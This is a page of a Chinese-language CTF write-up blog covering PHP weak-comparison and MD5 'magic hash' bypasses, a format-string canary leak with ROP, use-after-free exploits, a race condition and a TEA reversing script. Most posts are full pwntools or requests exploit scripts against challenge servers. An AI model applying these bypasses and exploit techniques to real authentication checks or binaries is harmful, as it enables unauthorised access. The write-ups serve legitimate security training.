Page 10 | Antel0p3's blog

wubba lubba dub dub.

php弱类型绕过

post @ 2023-07-03

php弱类型绕过

'' == 0 == false
'123' == 123
'abc' == 0
'123a' == 123
'0x01' == 1
'0e12346789' == '0e987654321'	（都解释为0）
[false] == [0] == [NULL] == ['']
NULL == false == 0
true == 1
true == "***"	(true和任意字符串弱相等)

例题

secretjson
页面源码

<?php
include_once 'secret.php'; // $flag  $key
if (isset($_POST['message'])) {
    $message = json_decode($_POST['message']);
    if ($message->key == $key) {
        echo $flag;
    } 
    else {
        echo "fail";
    }
}
else show_source(__FILE__);
?>

post –> message={“key”:true} 即可获取flag

SWPUCTF2021-jicao-wp

post @ 2023-06-28

题目链接
网页看到源代码，可知需要post id=wllmNB; get json={x=wllm}

<?php
highlight_file('index.php');
include("flag.php");
$id=$_POST['id'];
$json=json_decode($_GET['json'],true);
if ($id=="wllmNB"&&$json['x']=="wllm")
{echo $flag;}
?>

HackBar

python

import requests

post_data = {"id": "wllmNB"}
get_data = {"json": '{"x":"wllm"}'}

# params 为get数据,data为post数据
response = requests.post("http://node2.anna.nssctf.cn:28110/", data=post_data, params=get_data)

print(response.text)

SWPUCTF2021-easymd5-wp

post @ 2023-06-21

题目链接
页面内容明显要求name和password不同但md5哈希相同

<?php 
 highlight_file(__FILE__);
 include 'flag2.php';
 
if (isset($_GET['name']) && isset($_POST['password'])){
    $name = $_GET['name'];
    $password = $_POST['password'];
    if ($name != $password && md5($name) == md5($password)){
        echo $flag;
    }
    else {
        echo "wrong!";
    }
 
}
else {
    echo 'wrong!';
}
?>

1.寻找哈希碰撞

import requests

get_data = {
    "name": b'\x0e\x30\x65\x61\x55\x9a\xa7\x87\xd0\x0b\xc6\xf7\x0b\xbd'
            b'\xfe\x34\x04\xcf\x03\x65\x9e\x70\x4f\x85\x34\xc0\x0f\xfb'
            b'\x65\x9c\x4c\x87\x40\xcc\x94\x2f\xeb\x2d\xa1\x15\xa3\xf4'
            b'\x15\x5c\xbb\x86\x07\x49\x73\x86\x65\x6d\x7d\x1f\x34\xa4'
            b'\x20\x59\xd7\x8f\x5a\x8d\xd1\xef'}
post_data = {
    "password": b'\x0e\x30\x65\x61\x55\x9a\xa7\x87\xd0\x0b\xc6\xf7\x0b\xbd'
                b'\xfe\x34\x04\xcf\x03\x65\x9e\x74\x4f\x85\x34\xc0\x0f\xfb'
                b'\x65\x9c\x4c\x87\x40\xcc\x94\x2f\xeb\x2d\xa1\x15\xa3\xf4'
                b'\x15\xdc\xbb\x86\x07\x49\x73\x86\x65\x6d\x7d\x1f\x34\xa4'
                b'\x20\x59\xd7\x8f\x5a\x8d\xd1\xef'}
response = requests.post("http://node2.anna.nssctf.cn:28070/", data=post_data, params=get_data)
print(response.text)

2.传数组，md5处理数组都返回null

import requests

get_data = { "name[]": 1}
post_data = { "password[]": 2}
response = requests.post("http://node2.anna.nssctf.cn:28070/", data=post_data, params=get_data)
print(response.text)

3.都传0e开头的数字，传参时默认变为0，md5结果相同且`==`为弱比较

import requests

get_data = { "name": "s878926199a"}
post_data = { "password": "s214587387a"}
response = requests.post("http://node2.anna.nssctf.cn:28070/", data=post_data, params=get_data)
print(response.text)

'''
s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469
s214587387a
0e848240448830537924465865611904
s214587387a
0e848240448830537924465865611904
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s1885207154a
0e509367213418206700842008763514
s1502113478a
0e861580163291561247404381396064
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s155964671a
0e342768416822451524974117254469
s1184209335a
0e072485820392773389523109082030
s1665632922a
0e731198061491163073197128363787
s1502113478a
0e861580163291561247404381396064
s1836677006a
0e481036490867661113260034900752
s1091221200a
0e940624217856561557816327384675
s155964671a
0e342768416822451524974117254469
s1502113478a
0e861580163291561247404381396064
s155964671a
0e342768416822451524974117254469
s1665632922a
0e731198061491163073197128363787
s155964671a
0e342768416822451524974117254469
s1091221200a
0e940624217856561557816327384675
s1836677006a
0e481036490867661113260034900752
s1885207154a
0e509367213418206700842008763514
s532378020a
0e220463095855511507588041205815
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s214587387a
0e848240448830537924465865611904
s1502113478a
0e861580163291561247404381396064
s1091221200a
0e940624217856561557816327384675
s1665632922a
0e731198061491163073197128363787
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s1665632922a
0e731198061491163073197128363787
s878926199a
0e545993274517709034328855841020
240610708
0e462097431906509019562988736854
314282422
'''

深育杯2021-find_flag-wp

post @ 2023-06-20

0x1 分析

保护全开
gets —> printf —> gets
明显栈溢出，首先想到填满然后泄露canary，但是gets会自动将\n替换为\0
应用格式化字符串漏洞泄露canary和随机化基地址
system函数已在plt中
有cat flag字符串

0x2 exp

第一个gets，格式化字符串泄露canary和base
第二个gets，ROP

from pwn import *
import sys
pty = process.PTY
context(os='linux', log_level='debug')

mode = sys.argv[1] if len(sys.argv) > 1 else ''
if mode == 'r':
    proc = remote("node4.anna.nssctf.cn", 28372)
else:
    proc = process("./bin", stdin=pty, stdout=pty)

belf = ELF("./bin")


def s(x): proc.send(x)
def sl(x): return proc.sendline(x)
def sd(x): return proc.send(x)
def sla(x, y): return proc.sendlineafter(x, y)
def sa(x, y): return proc.sendafter(x, y)
def ru(x): return proc.recvuntil(x)
def rc(x=0xfffffff): return proc.recv(x)
def rl(): return proc.recvline()
def li(con): return log.info(con)
def ls(con): return log.success(con)
def pi(): return proc.interactive()
def pcls(): return proc.close()
def ga(): return u64(ru(b'\x7f')[-6:].ljust(8, b'\x00'))

gscript = '''
    b main
    fin
    fin
    fin
    fin
    ni 80
'''
if mode == 'd':
    gdb.attach(proc, gdbscript=gscript)

# 格式化字符串泄露 canary和随机化base
sla(b'name? ', b'%p '*0x13)

ru(b', ')
t = ru(b'!\n').decode().split(' ')
print(t)

canary = int(t[-4], 16)
base = int(t[-2], 16)-0x146f
catflag_addr = base+0x2004
system_plt = base+belf.plt['system']
rdi_ret = base+0x00000000000014e3
ret = base+0x000000000000101a


ls("canary: "+hex(canary))
ls("catflag_addr: "+hex(catflag_addr))

# ROP
sl(b'h'*0x38 + p64(canary)+b'h'*8+p64(ret) +
    p64(rdi_ret)+p64(catflag_addr)+p64(system_plt))

pi()
pause()

NISACTF2022-uaf-wp

post @ 2023-06-19

0x1 分析

PIE未开
free完没有置空，存在uaf漏洞
存在后门函数NICO(char* command)，执行system(command);
page为结构体指针数组结构体组成：char str[4] 和 void* func (各为32位)
show(0) 会执行 (page[0]->func)(page[0]->str)

0x2 思路

create page[0]
del page[0]
create page[1] （此时page[0]和page[1]相同，指向相同空间）
edit page[1] —-> ‘sh\0\0’+p32(NICO) (即修改了page[0])
show(0)

0x3 exp

from pwn import *
pty = process.PTY
context(os='linux', arch='i386', log_level='debug')

proc = process("./bin", stdin=pty, stdout=pty)
# proc = remote("node4.anna.nssctf.cn", 28035)
belf = ELF("./bin")

def s(x): proc.send(x)
def sl(x): return proc.sendline(x)
def sd(x): return proc.send(x)
def sla(x, y): return proc.sendlineafter(x, y)
def sa(x, y): return proc.sendafter(x, y)
def ru(x): return proc.recvuntil(x)
def rc(): return proc.recv()
def rl(): return proc.recvline()
def li(con): return log.info(con)
def ls(con): return log.success(con)
def pi(): return proc.interactive()
def pcls(): return proc.close()
def ga(): return u64(ru(b'\x7f')[-6:].ljust(8, b'\x00'))

def add():
    sla(b':', b'1')

def dlt(idx):
    sla(b':', b'3')
    sla(b'page\n', str(idx).encode())

def shw(idx):
    sla(b':', b'4')
    sla(b'page\n', str(idx).encode())

def edt(idx, con):
    sla(b':', b'2')
    sla(b'page\n', str(idx).encode())
    sla(b'strings\n', con)

gscript = '''
    b main
    b create
    b del
    b show
    b edit
'''
# gdb.attach(proc, gdbscript=gscript)

NICO_addr = 0x08048642

add()
dlt(0)
add()
edt(1, b'sh\x00\x00'+p32(NICO_addr))
shw(0)

pi()
pause()

GDOUCTF2023-tea-wp

post @ 2023-06-17

0x1 分析

Shift+F12 查看字符串，追寻到 “you are right.”的使用处，发现核心处理代码

进入查看发现35行 sub_140011339 将key置为[2233,4455,6677,8899]
36行 sub_140011145 将input复制到v9，无用
37行 sub_1400112B7 利用input和key执行核心加密算法，且可逆向
38行 sub_140011352 检查结果

0x2 逆向脚本

逆写算法就可以，注意循环下标也要逆序

#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <limits.h>

int main() {
	unsigned int a1[]= {0x1A800BDA, 0xF7A6219B, 0x491811D8, 0xF2013328, 0x156C365B, 0x3C6EAAD8, 0x84D4BF28, 0xF11A7EE7, 0x3313B252, 0xDD9FE279 };
	int a2[]={2233,4455,6677,8899};
	int v3,v5,v6;
	for (int i = 8; i >= 0; i-- ) {
		v5 = 0;
		v6 = 256256256 * i;
		v3 = i + 1;
		for(int j=0; j<=0x20; j++) {
			v6+=256256256;
		}
		do {
			++v5;
			v6 -= 256256256;
			a1[v3] -= (v6 + a2[(v6 >> 11) & 3]) ^ (a1[i] + ((a1[i] >> 5) ^ (16 * a1[i])));
			a1[i] -= v6 ^ (a1[v3] + ((a1[v3] >> 5) ^ (16 * a1[v3]))) ^ (v6 + a2[v6 & 3]);
		} while ( v5 <= 0x20 );
	}
	for(int i=0;i<10;i++){
		printf("%#x ",a1[i]);
	}
	return 0;
}

HZCTF{hzCtf_94_re666fingcry5641qq}

zer0pts2020-easystrcmp-wp

post @ 2023-06-15

0x1 分析

NISACTF2022-shoppwn-wp

post @ 2023-06-13

0x1 分析

sell的时候使用pthread_create，其中有usleep，只要发送速度足够快，可以卖出两次

0x2 exp

echo -e '3\n0\n3\n0\n2\n1\n1\n' | nc node3.anna.nssctf.cn 28736
# sell pen
# sell pen
# buy flag
# show

GDOUCTF2023-小学数学-wp

post @ 2023-06-13

exp

查看server.py代码逻辑, 简单替换运算

from pwn import *
context.log_level = 'debug'

proc = remote("node4.anna.nssctf.cn", 28793)

def sl(x): return proc.sendline(x)
def sd(x): return proc.send(x)
def sla(x, y): return proc.sendlineafter(x, y)
def sa(x, y): return proc.sendafter(x, y)
def ru(x): return proc.recvuntil(x)
def rc(): return proc.recv()
def rl(): return proc.recvline()
def li(con): return log.info(con)
def ls(con): return log.success(con)
def pi(): return proc.interactive()
def pcls(): return proc.close()

d = {'//': '*', 'x': '-', '-': '+', '%': '//', '+': '%'}
sla(b'start...', b'')
for i in range(301):
    ru(b'Round')
    ru(b'\n')
    epr = ru(b'= ')[:-3].decode().split(' ') #空格分隔
    epr[1] = d[epr[1]] # 替换运算符
    epr = ''.join(epr)
    print(epr)
    sl(str(eval(epr)).encode())

BJDCTF2020 girlfriend-wp

post @ 2023-06-12

use after free

from pwn import *
from ctypes import *
context.log_level = 'debug'
pty = process.PTY

proc = process("./girlfriend", stdin=pty, stdout=pty)
# proc = remote("node2.anna.nssctf.cn", 28783)
belf = ELF("./girlfriend")
libc = ELF("/usr/ctf/pwn/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so")

def sl(x): return proc.sendline(x)
def sd(x): return proc.send(x)
def sla(x, y): return proc.sendlineafter(x, y)
def sa(x, y): return proc.sendafter(x, y)
def ru(x): return proc.recvuntil(x)
def rc(): return proc.recv()
def rl(): return proc.recvline()
def li(con): return log.info(con)
def ls(con): return log.success(con)
def pi(): return proc.interactive()
def pcls(): return proc.close()

def add(size, con):
    sla(b'choice :', b'1')
    sla(b'size is :', str(size).encode())
    sa(b'name is :', con)

def dlt(idx):
    sla(b'choice :', b'2')
    sla(b'Index :', str(idx).encode())

def shw(idx):
    sla(b'choice :', b'3')
    sla(b'Index :', str(idx).encode())

gscript = '''
    b add_girlfriend
    b del_girlfriend
    hook-bins
    memory watch 0x00000000006020A0 6 qword
'''
# gdb.attach(proc, gdbscript=gscript)

backdoor = 0x0000000000400B9C

add(0x10, p64(backdoor))    #add时先分配 struc_ptr 再分配 name_ptr
add(0x20, p64(backdoor))
dlt(0)      # delete的时候先free  name_ptr 再free struc_ptr
dlt(1)      # 所以name_ptr 先进入fastbin
# 两次delete结束后fastbin: 
# [0x20] chunk3(struc_ptr) -> chunk1(struc_ptr) -> chunk2(name_ptr)
# [0x30] chunk4(name_ptr)
# 再次add, chunk1 会被当做 name_ptr
# 这样就可以复写它的 func_ptr, 再执行show，就执行了后门函数
add(0x10, p64(backdoor))
shw(0)
pi()

Prev Home Next

⬆︎TOP